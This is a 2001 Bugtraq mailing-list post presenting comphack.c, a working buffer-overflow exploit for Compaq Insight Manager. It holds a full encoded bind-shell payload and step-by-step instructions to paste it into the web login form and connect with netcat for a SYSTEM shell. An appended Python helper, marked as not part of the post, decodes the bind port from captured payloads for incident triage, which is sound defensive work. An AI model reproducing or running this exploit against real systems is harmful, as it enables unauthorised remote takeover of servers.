comphack - Compaq Insight Manager Remote SYSTEM shell

From: Indigo (indig0@talk21.com)
Date: 11/29/01


Date: 29 Nov 2001 11:54:47 -0000
Message-ID: <20011129115447.30876.qmail@mail.securityfocus.com>
From: Indigo <indig0@talk21.com>
To: bugtraq@securityfocus.com
Subject: comphack - Compaq Insight Manager Remote SYSTEM shell



I'm running out of Win32 vulnerabilities to exploit
here...Anyone got any ideas?

Cheers,

Indigo.



/* comphack.c - Compaq Insight Manager overflow exploit
   by Indigo <indig0@talk21.com> 2001

        Usage: comphack <victim port>

        This code has been compiled and tested on Linux and Win32

        The shellcode spawns a SYSTEM shell on the chosen port

        Main shellcode adapted from code written by izan@deepzone.org

        Greets to:

        Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds
*/

#include <stdio.h>
#include <stdlib.h>             /* atoi(), exit() */
#ifdef _WIN32
#include <winsock2.h>           /* htons() on Win32; link against ws2_32 */
#else
#include <arpa/inet.h>          /* htons() on Linux */
#endif

int main(int argc, char **argv)
{
        /* Payload: leading 0x61 padding, then the bind-shell code.  The
           listener port is patched in at offsets 1650 and 1651 below. */
        unsigned char shellcode[] =
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
        "\x61\x61\x61\x61\x61\x61\x61\x61\x2B\x16\xEA\x77\xFF\xE1\x03\x10"
        "\xEA\x2F\x05\x10\x90\x90\x90\x90\x31\xFF\x01\xE7\x31\xC9\xB1\x6F"
        "\x01\xCF\xB1\x4C\x01\xCF\x31\xC0\xB0\x20\x29\x07\x31\xDB\xB3\x18"
        "\x01\xDF\x29\x07\xB3\x20\x01\xDF\x29\x07\xB3\x1D\x01\xDF\x29\x07"
        "\xB3\x19\x01\xDF\x29\x07\xB3\x55\x01\xDF\x29\x07\xB3\x05\x01\xDF"
        "\xB3\x05\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07\xB3\x12\x01\xDF"
        "\x29\x07\xB3\x17\x01\xDF\x29\x07\xB3\x07\x01\xDF\x29\x07\xB3\x14"
        "\x01\xDF\x29\x07\xB3\x28\x01\xDF\x29\x07\xB3\x3F\x01\xDF\x29\x07"
        "\xB3\x7C\x01\xDF\x29\x07\xB3\xCE\x01\xDF\x29\x07\xB3\x08\x01\xDF"
        "\x29\x07\xB3\x3B\x01\xDF\x29\x07\xB3\x4B\x01\xDF\x29\x07\x66\x81"
        "\xEF\xA3\x03\x31\xDB\xB8\x5F\x5F\x5F\x5F\x31\x07\x47\x47\x47\x47"
        "\x43\x43\x43\x43\x66\x81\xFB\xFC\x04\x7E\xEF\xB7\x5F\x5F\x5F\x5F"
        "\x02\xDE\xB2\xA6\x7E\x1F\x5F\xD2\xEA\xAD\x7B\x1F\x5F\xD2\xE2\xA5"
        "\x7B\x1F\x5F\x35\x58\xCF\xCF\xCF\xCF\x06\xB7\xAD\x5D\x5F\x5F\xD2"
        "\xEA\x75\x7A\x1F\x5F\xD2\xE2\x6C\x7A\x1F\x5F\x35\x55\xCF\xCF\xCF"
        "\xCF\x06\xB7\xE5\x5D\x5F\x5F\x35\x5F\xD2\xEA\xA6\x7A\x1F\x5F\x09"
        "\xD2\xEA\xBA\x7A\x1F\x5F\x09\xD2\xEA\xB6\x7A\x1F\x5F\x09\xA0\xCA"
        "\x6C\x7A\x1F\x5F\x35\x5F\xD2\xEA\xA6\x7A\x1F\x5F\x09\xD2\xEA\xB2"
        "\x7A\x1F\x5F\x09\xD2\xEA\xAE\x7A\x1F\x5F\x09\xA0\xCA\x6C\x7A\x1F"
        "\x5F\xB8\xDA\xAA\x7A\x1F\x5F\x1B\x5F\x5F\x5F\xD2\xEA\xAA\x7A\x1F"
        "\x5F\x09\xA0\xCA\x68\x7A\x1F\x5F\xD2\xEA\x72\x79\x1F\x5F\xF2\x0F"
        "\xA0\xCA\x0C\x7A\x1F\x5F\xD2\xEA\x6E\x79\x1F\x5F\xF2\x0F\xA0\xCA"
        "\x0C\x7A\x1F\x5F\xD2\xEA\xAE\x7A\x1F\x5F\xD2\xE2\x72\x79\x1F\x5F"
        "\xFA\xD2\xEA\xBA\x7A\x1F\x5F\xF2\xD2\xE2\x6E\x79\x1F\x5F\xF4\xD2"
        "\xE2\x6A\x79\x1F\x5F\xF4\xB8\xDA\x7A\x79\x1F\x5F\x5F\x5F\x5F\x5F"
        "\xB8\xDA\x7E\x79\x1F\x5F\x5E\x5E\x5F\x5F\xD2\xEA\x66\x79\x1F\x5F"
        "\x09\xD2\xEA\xAA\x7A\x1F\x5F\x09\x35\x5F\x35\x5F\x35\x4F\x35\x5E"
        "\x35\x5F\x35\x5F\xD2\xEA\x16\x79\x1F\x5F\x09\x35\x5F\xA0\xCA\x64"
        "\x7A\x1F\x5F\x37\x5F\x7F\x5F\x5F\xCF\x37\x5F\x5D\x5F\x5F\xA0\xCA"
        "\x1C\x7A\x1F\x5F\xD6\xDA\x0E\x79\x1F\x5F\x6C\xBF\x0F\x1F\x0F\x1F"
        "\x0F\xA0\xCA\xA5\x7B\x1F\x5F\x0F\x04\x35\x4F\xD2\xEA\xB6\x7A\x1F"
        "\x5F\x09\x0C\xA0\xCA\xA1\x7B\x1F\x5F\x35\x5C\x0C\xA0\xCA\x5D\x7A"
        "\x1F\x5F\xD2\xEA\x2A\x79\x1F\x5F\x09\xD2\xEA\xB6\x7A\x1F\x5F\x09"
        "\x0C\xA0\xCA\x59\x7A\x1F\x5F\xD2\xE2\x06\x79\x1F\x5F\xF4\x6C\xBF"
        "\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F"
        "\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F"
        "\x5F\xB4\x12\xCF\xCF\xCF\x6C\xBF\x0F\xD2\xE2\x3A\x79\x1F\x5F\x08"
        "\x0F\x0F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F"
        "\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xDC\xE2\x3A\x79\x1F\x5F\x5D"
        "\x50\xDD\x48\x5E\x5F\x5F\xDE\xE2\x3A\x79\x1F\x5F\x5E\x7F\x5F\x5F"
        "\x2D\x51\xCF\xCF\xCF\xCF\xB8\xDA\x3A\x79\x1F\x5F\x5F\x7F\x5F\x5F"
        "\x35\x5F\xD4\xDA\x3A\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F"
        "\xD4\xDA\x0E\x79\x1F\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0"
        "\xCA\x18\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xD4\xDA\x3A"
        "\x79\x1F\x5F\x35\x5F\x0F\xD2\xEA\x0E\x79\x1F\x5F\xF2\x0F\xD2\xEA"
        "\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x55\x7A\x1F\x5F\x35\x5F\xD2\xE2"
        "\x3A\x79\x1F\x5F\x08\x35\x5F\x35\x5F\x35\x5F\xD2\xEA\xB6\x7A\x1F"
        "\x5F\xF2\x0F\xA0\xCA\x60\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F"
        "\x5F\x6C\xB6\x66\xD2\x3A\x79\x1F\x5F\x50\xD8\x38\xA0\xA0\xA0\x35"
        "\x5F\x37\x5F\x7F\x5F\x5F\xCF\xD2\xEA\x0E\x79\x1F\x5F\xF2\x0F\xD2"
        "\xEA\x06\x79\x1F\x5F\xF2\x0F\xA0\xCA\x51\x7A\x1F\x5F\xD6\xDA\x3E"
        "\x79\x1F\x5F\x35\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD2\xEA\x0E"
        "\x79\x1F\x5F\xF2\x0F\xD2\xEA\xB2\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x14"
        "\x7A\x1F\x5F\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\x35\x5F\xD4\xDA\x3E"
        "\x79\x1F\x5F\xD2\xE2\x3A\x79\x1F\x5F\x08\x0F\xD4\xDA\x0E\x79\x1F"
        "\x5F\x0F\xD2\xEA\xB6\x7A\x1F\x5F\xF2\x0F\xA0\xCA\x18\x7A\x1F\x5F"
        "\x35\x6F\xA0\xCA\x10\x7A\x1F\x5F\xB6\xE6\xA1\xA0\xA0\xD2\xEA\x06"
        "\x79\x1F\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\xD2\xEA\x02\x79\x1F"
        "\x5F\xF2\x0F\xA0\xCA\x4D\x7A\x1F\x5F\x35\x5F\xA0\xCA\x08\x7A\x1F"
        "\x5F\x0E\x09\x37\x0F\x6D\x5A\x4F\xCF\x05\xA0\x4D\x0F\x04\x06\x08"
        "\x01\x0E\x09\x0C\x37\x07\x6D\x5A\x4F\xCF\x05\xA0\x4D\x0F\xF3\xDB"
        "\xBF\x2A\xA4\x07\xF4\x06\xBD\xB6\xBC\x08\x0C\x10\x1C\x14\x6C\x6D"
        "\x5F\x2C\x30\x3C\x34\x3A\x2B\x5F\x3D\x36\x31\x3B\x5F\x33\x36\x2C"
        "\x2B\x3A\x31\x5F\x3E\x3C\x3C\x3A\x2F\x2B\x5F\x2C\x3A\x31\x3B\x5F"
        "\x2D\x3A\x3C\x29\x5F\x3C\x33\x30\x2C\x3A\x2C\x30\x3C\x34\x3A\x2B"
        "\x5F\x14\x1A\x2D\x11\x1A\x13\x6C\x6D\x5F\x1C\x2D\x3A\x3E\x2B\x3A"
        "\x0F\x36\x2F\x3A\x5F\x18\x3A\x2B\x0C\x2B\x3E\x2D\x2B\x2A\x2F\x16"
        "\x31\x39\x30\x1E\x5F\x1C\x2D\x3A\x3E\x2B\x3A\x0F\x2D\x30\x3C\x3A"
        "\x2C\x2C\x1E\x5F\x0F\x3A\x3A\x34\x11\x3E\x32\x3A\x3B\x0F\x36\x2F"
        "\x3A\x5F\x18\x33\x30\x3D\x3E\x33\x1E\x33\x33\x30\x3C\x5F\x2D\x3A"
        "\x3E\x3B\x19\x36\x33\x3A\x5F\x08\x2D\x36\x2B\x3A\x19\x36\x33\x3A"
        "\x5F\x0C\x33\x3A\x3A\x2F\x5F\x1C\x33\x30\x2C\x3A\x17\x3E\x31\x3B"
        "\x33\x3A\x5F\x1A\x27\x36\x2B\x0F\x2D\x30\x3C\x3A\x2C\x2C\x5F\x1C"
        "\x30\x3B\x3A\x3B\x7F\x3D\x26\x7F\x23\x05\x3E\x31\x7F\x63\x36\x25"
        "\x3E\x31\x1F\x3B\x3A\x3A\x2F\x25\x30\x31\x3A\x71\x30\x2D\x38\x61"
        "\x5D\x5F\x40\x17\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
        "\x53\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5E\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
        "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
        "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
        "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
        "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
        "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
        "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
        "\x1C\x12\x1B\x71\x1A\x07\x1A\x5F\x5F\x5F\x5F\x5F\x4F\x5F\x5F\x5F"
        "\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F\x5F"
        "\x56\x56\x56\x56\x56\x00";

        FILE *fp;
        unsigned short int a_port;

        printf ("\nCompaq Insight Manager overflow launcher\nby Indigo <indig0@talk21.com> 2001\n\n");
        printf ("This program will generate a binary file called exploit.bin\n");
        printf ("Connect to the victim using a web browser http://victim:2301\n");
        printf ("Next to \'Login Account\', click on \'anonymous\'\n");
        printf ("Enter some random characters into the \'password\' field\n");
        printf ("Open exploit.bin in notepad, highlight it then copy to the clipboard\n");
        printf ("Paste the exploit into the \'Name\' field and click OK\n");
        printf ("\nLaunch netcat: nc <victim host> <victim port>\n");
        printf ("\nThe exploit spawns a SYSTEM shell on the chosen port\n\n");

        if (argc != 2)
        {
                printf ("Usage: %s <victim port>\n", argv[0]);
                exit (0);
        }

        /* The port is stored in network byte order and masked with 0x5f5f
           before being patched into the payload at offsets 1650 and 1651. */
        a_port = htons(atoi(argv[1]));
        a_port ^= 0x5f5f;

        shellcode[1650] = a_port & 0xff;
        shellcode[1651] = (a_port >> 8) & 0xff;

        fp = fopen ("./exploit.bin", "wb");
        if (fp == NULL)
        {
                perror ("fopen");
                return 1;
        }

        /* The array holds no NUL byte before its terminator, so fputs()
           writes the whole payload. */
        fputs ((const char *) shellcode, fp);

        fclose (fp);

        return 0;
}
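The launcher above patches the listener port into the payload at offsets 1650 and 1651 after masking it with 0x5f5f, and the unpatched bytes at those offsets in the posted array (\x40\x17) decode to port 8008. For an incident responder who recovers an exploit.bin-style blob from a web log, proxy capture or form submission, the following Python is an added triage helper, not part of Indigo's post: it recovers the bind-shell port a captured payload would open and flags values that have the size and leading 0x61 padding of the posted one. It assumes the launcher was built on a little-endian (x86) host, as the post's Linux and Win32 builds were, and the sample payload it constructs for testing only mimics the length and padding of the posted array, not its contents.

```python
# Added triage helper, not part of Indigo's post.  Given a captured
# exploit.bin-style blob (e.g. a form-field value pulled from a web log or
# proxy capture), recover the bind-shell port and check whether the value
# has the size and leading padding of the posted payload.

PAYLOAD_LEN = 1814      # bytes in the posted shellcode[] array, C NUL terminator excluded (counted from the post)
PORT_OFFSET = 1650      # the launcher writes the port to shellcode[1650] and [1651]
PORT_XOR_KEY = 0x5F     # per-byte half of the 0x5f5f mask the launcher applies
PAD_BYTE = 0x61         # the run of 'a' bytes that opens the posted payload


def encode_bind_port(port: int) -> bytes:
    """Reproduce the launcher's patch step as it behaves on a little-endian
    (x86) build, which is an assumption about how the post was compiled:
    htons(port) ^ 0x5f5f stored low byte first puts the port's high byte at
    offset 1650 and its low byte at 1651, each XORed with 0x5F."""
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    hi, lo = port >> 8, port & 0xFF
    return bytes([hi ^ PORT_XOR_KEY, lo ^ PORT_XOR_KEY])


def decode_bind_port(payload: bytes) -> int:
    """Recover the TCP port the bind shell would listen on."""
    if len(payload) < PORT_OFFSET + 2:
        raise ValueError("payload shorter than the port offset")
    hi = payload[PORT_OFFSET] ^ PORT_XOR_KEY
    lo = payload[PORT_OFFSET + 1] ^ PORT_XOR_KEY
    return (hi << 8) | lo


def leading_pad_length(payload: bytes) -> int:
    """Length of the run of 0x61 ('a') bytes at the start of the payload."""
    n = 0
    while n < len(payload) and payload[n] == PAD_BYTE:
        n += 1
    return n


def triage(payload: bytes) -> dict:
    """Summarise a captured value: does it have the shape of the posted
    payload, and if so which port would it open?  The 256-byte padding
    threshold is a heuristic chosen here, not a figure from the post."""
    pad = leading_pad_length(payload)
    report = {
        "length": len(payload),
        "leading_pad": pad,
        "length_matches_post": len(payload) == PAYLOAD_LEN,
        "suspicious": pad >= 256 and len(payload) >= PORT_OFFSET + 2,
    }
    if report["suspicious"]:
        report["bind_port"] = decode_bind_port(payload)
    return report


def build_sample_payload(port: int) -> bytes:
    """Constructed stand-in for exploit.bin used to exercise triage(): the
    456 leading 'a' bytes and 1814-byte length of the posted array, 0x5F
    filler elsewhere, and the encoded port at offset 1650.  It contains
    none of the real payload's code."""
    buf = bytearray(b"\x5f" * PAYLOAD_LEN)
    buf[:456] = b"a" * 456
    buf[PORT_OFFSET:PORT_OFFSET + 2] = encode_bind_port(port)
    return bytes(buf)


if __name__ == "__main__":
    # Constructed input: a sample shaped like the posted payload, port 4444.
    print(triage(build_sample_payload(4444)))
```

Feed `triage()` the raw bytes of the submitted field value rather than a decoded string, since the launcher writes the file with "wb" and the payload is mostly non-printable. The padding check is a shape heuristic for prioritising a capture, not a signature; the port decode is the part that matters operationally, because it tells you which listener to look for on the host that received the request.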


